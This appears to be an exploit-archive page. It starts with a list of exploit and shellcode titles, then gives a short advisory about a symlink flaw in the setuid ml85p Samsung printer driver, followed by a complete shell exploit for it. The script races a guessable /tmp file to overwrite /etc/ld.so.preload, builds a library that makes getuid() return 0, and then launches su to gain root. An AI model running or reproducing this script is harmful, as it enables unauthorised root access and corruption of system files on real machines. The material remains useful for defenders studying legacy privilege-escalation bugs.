
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
61 lines
No EOL
1.8 KiB
Bash
Executable file
61 lines
No EOL
1.8 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/3008/info
|
|
|
|
ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.
|
|
|
|
ml85p does not check for symbolic links when creating image output files.
|
|
|
|
These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.
|
|
|
|
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.
|
|
|
|
#!/bin/sh
|
|
# Exploit using /usr/bin/ml85p default setuid program on
|
|
# Mandrake Linux 8.0
|
|
#
|
|
# You need to be in the sys group to be able to execute
|
|
# ml85p.
|
|
|
|
echo "** ml85p exploit"
|
|
# set the required umask
|
|
umask 0
|
|
|
|
# get the number of seconds since 1970
|
|
DATE=`date +"%s"`
|
|
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
|
|
then
|
|
echo "** this exploit requires that /usr/bin/ml85p is setuid and
|
|
executable."
|
|
exit 1
|
|
fi
|
|
|
|
if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
|
|
then
|
|
echo "** this exploit requires that /etc/ld.so.preload does not exist."
|
|
exit 1
|
|
fi
|
|
|
|
echo "** creating file"
|
|
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
|
|
echo "bleh" | /usr/bin/ml85p -s
|
|
rm /tmp/ml85g"$DATE"
|
|
|
|
echo "** creating shared library"
|
|
cat << _EOF_ > /tmp/g.c
|
|
int getuid(void) { return(0); }
|
|
_EOF_
|
|
|
|
echo "** compiling and linking shared object"
|
|
gcc -c -o /tmp/g.o /tmp/g.c
|
|
ld -shared -o /tmp/g.so /tmp/g.o
|
|
rm -f /tmp/g.c /tmp/g.o
|
|
|
|
echo "** rigging ld.so.preload"
|
|
echo "/tmp/g.so" > /etc/ld.so.preload
|
|
echo "** execute su. warning all getuid() calls will return(0) until you remove"
|
|
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so
|
|
without"
|
|
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
|
|
su -
|
|
echo "** cleaning up"
|
|
> /etc/ld.so.preload
|
|
rm -f /tmp/g.so |